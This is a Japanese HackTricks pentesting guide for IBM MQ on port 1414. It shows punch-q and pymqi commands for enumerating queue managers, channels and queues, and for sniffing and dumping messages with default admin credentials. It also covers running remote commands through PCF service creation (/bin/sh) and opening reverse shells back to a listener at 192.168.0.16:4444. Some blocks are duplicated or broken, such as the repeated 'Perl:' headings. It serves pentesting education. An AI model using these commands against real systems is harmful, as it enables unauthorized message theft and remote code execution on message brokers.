hacktricks/network-services-pentesting/1414-pentesting-ibmmq.md

350 lines
21 KiB
Markdown
Raw Normal View History

# 1414 - IBM MQのペンテスト
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## 基本情報
IBM MQは、メッセージキューを管理するためのIBMテクロジーです。他の**メッセージブローカー**技術と同様に、プロデューサーとコンシューマー間の情報を受信、保存、処理、分類することに特化しています。
**デフォルトでは、IBM MQはTCPポート1414を公開**しています。
時々、HTTP REST APIがポート**9443**で公開されていることがあります。
メトリクスPrometheusはTCPポート**9157**からアクセスできる場合もあります。
IBM MQ TCPポート1414は、メッセージ、キュー、チャネルなどを操作するだけでなく、**インスタンスを制御するためにも使用**できます。
IBMは、[https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq)で大規模な技術ドキュメントを提供しています。
## ツール
簡単な攻撃には、Dockerを使用した**[punch-q](https://github.com/sensepost/punch-q)**が推奨されています。このツールは、Pythonライブラリ`pymqi`を積極的に使用しています。
より手動的なアプローチには、Pythonライブラリ**[pymqi](https://github.com/dsuch/pymqi)**を使用します。[IBM MQの依存関係](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)が必要です。
### pymqiのインストール
**IBM MQの依存関係**をインストールしてロードする必要があります:
1. [https://login.ibm.com/](https://login.ibm.com/)でアカウントIBMidを作成します。
2. [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)からIBM MQライブラリをダウンロードします。Linux x86_64用には**9.0.0.4-IBM-MQC-LinuxX64.tar.gz**があります。
3. 解凍します(`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`)。
4. ライセンス条件に同意するために`sudo ./mqlicense.sh`を実行します。
>Kali Linuxを使用している場合は、ファイル`mqlicense.sh`を変更してください次の行105-110行目を削除/コメントアウトします:
>
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
5. これらのパッケージをインストールします:
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. 次に、`.so` ファイルを一時的に LD に追加します: `export LD_LIBRARY_PATH=/opt/mqm/lib64` を実行し、他のツールを実行する**前に**これらの依存関係を使用します。
次に、プロジェクト [**pymqi**](https://github.com/dsuch/pymqi) をクローンします。これには興味深いコードスニペット、定数などが含まれています。または、次のコマンドを使用してライブラリを直接インストールできます: `pip install pymqi`
### punch-q の使用
#### Docker を使用する場合
単純に次を使用します: `sudo docker run --rm -ti leonjza/punch-q`
#### Docker を使用しない場合
プロジェクト [**punch-q**](https://github.com/sensepost/punch-q) をクローンし、インストールのために readme に従います (`pip install -r requirements.txt && python3 setup.py install`)。
その後、`punch-q` コマンドで使用できます。
## 列挙
**punch-q** または **pymqi** を使用して、**キュー管理者名、ユーザー、チャネル、およびキュー** を列挙できます。
### キュー管理者
時々、キュー管理者名を取得する際に保護がされていないことがあります:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### チャンネル
**punch-q**は既存のチャンネルを見つけるために内部(変更可能)のワードリストを使用しています。使用例:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
IBM MQの一部インスタンスは、**認証されていない**MQリクエストを受け入れることがあり、`--username / --password`は必要ありません。もちろん、アクセス権も異なる場合があります。
一度チャネル名(ここでは `DEV.ADMIN.SVRCONN`)を取得すると、他のすべてのチャネルを列挙できます。
列挙は基本的に、**pymqi**の`code/examples/dis_channels.py`というコードスニペットで行うことができます。
```python
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
```
... しかし、**punch-q**もその部分を埋め込みます(詳細情報付き!)。
次のようにして起動できます:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
```
### キュー
**pymqi** (`dis_queues.py`) でコードスニペットがありますが、**punch-q** はキューに関するさらに多くの情報を取得できます。
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
```
## Exploit
### メッセージのダンプ
キュー/チャネルをターゲットにして、そこからメッセージをスニッフィング/ダンプすることができます(破壊的な操作ではありません)。*例:*
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**特定されたすべてのキューで反復処理をためらわないでください。**
### コード実行
> 続行する前にいくつかの詳細: IBM MQ は複数の方法で制御できます: MQSC、PCF、Control Command。一般的なリストは[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison)にあります。
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) は、インスタンスとリモートでやり取りするために焦点を当てています。**punch-q** そしてさらに **pymqi** は PCF インタラクションに基づいています。
>
> PCF コマンドのリストを見つけることができます:
> * [PCFドキュメントから](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats)、および
> * [定数から](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes)。
>
> 興味深いコマンドの1つは `MQCMD_CREATE_SERVICE` で、そのドキュメントは[こちら](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms)で利用できます。これは、インスタンス上のローカルプログラムを指す `StartCommand` を引数として取ります(例: `/bin/sh`)。
>
> ドキュメントにはコマンドの警告もあります: *"注意: このコマンドを使用すると、ユーザーが mqm 権限で任意のコマンドを実行できます。このコマンドの使用権限が付与された場合、悪意のあるユーザーや不注意なユーザーが、システムやデータを破損するサービスを定義できる可能性があります。たとえば、重要なファイルを削除することができます。"*
>
> *注: IBM MQドキュメント管理リファレンスによれば、サービス作成`DEFINE SERVICE`のための等価なMQSCコマンドを実行するためのHTTPエンドポイント `/admin/action/qmgr/{qmgrName}/mqsc` も存在します。この側面はここではまだカバーされていません。*
リモートプログラムの実行のためのPCFによるサービスの作成/削除は **punch-q** によって行うことができます:
**例1**
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> IBM MQのログには、次のようにコマンドが正常に実行されたことが記録されています
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```
マシン上の既存のプログラムを列挙することもできます(ここでは`/bin/doesnotexist`は存在しません):
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**プログラムの起動が非同期であることに注意してください。そのため、エクスプロイトを活用するためには、別のアイテムが必要です** ***(逆シェル用のリスナー、異なるサービスでのファイル作成、ネットワークを介したデータの外部への送信など)***
**例2**
簡単な逆シェルのために、**punch-q** はまた、2つの逆シェルペイロードを提案しています
- bashを使用したもの
- perlを使用したもの
*もちろん、`execute`コマンドを使用してカスタムの逆シェルを構築することもできます。*
bash用:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
```plaintext
Perl:
```
```plaintext
Perl:
```
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### カスタム PCF
IBM MQ のドキュメントを調査し、**punch-q** で実装されていない特定の PCF コマンドをテストするために **pymqi** Python ライブラリを直接使用できます。
**例:**
```python
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response
qmgr.disconnect()
```
定数名が見つからない場合は、[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors)を参照できます。
> *[`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster)の例10進数 = 73。`MQCA_CLUSTER_NAME`10進数 = 2029が必要で、`*`にすることができますDoc: :*
>
> ```python
> import pymqi
>
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
>
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
>
> try:
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("Error")
> else:
> print(response)
>
> qmgr.disconnect()
> ```
## テスト環境
IBM MQの動作と脆弱性をテストしたい場合は、Dockerをベースにしたローカル環境をセットアップできます
1. ibm.comおよびcloud.ibm.comにアカウントを持っていること。
2. 次の手順でコンテナ化されたIBM MQを作成します
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
デフォルトでは、認証が有効になっており、ユーザー名は `admin` でパスワードは `passw0rd` です(環境変数 `MQ_ADMIN_PASSWORD`)。
ここでは、キューマネージャー名が `MYQUEUEMGR` に設定されています(変数 `MQ_QMGR_NAME`)。
IBM MQ が稼働しており、ポートが公開されている必要があります:
```bash
sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
> IBM MQの古いバージョンのDockerイメージは次の場所にあります: https://hub.docker.com/r/ibmcom/mq/.
## 参考文献
* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)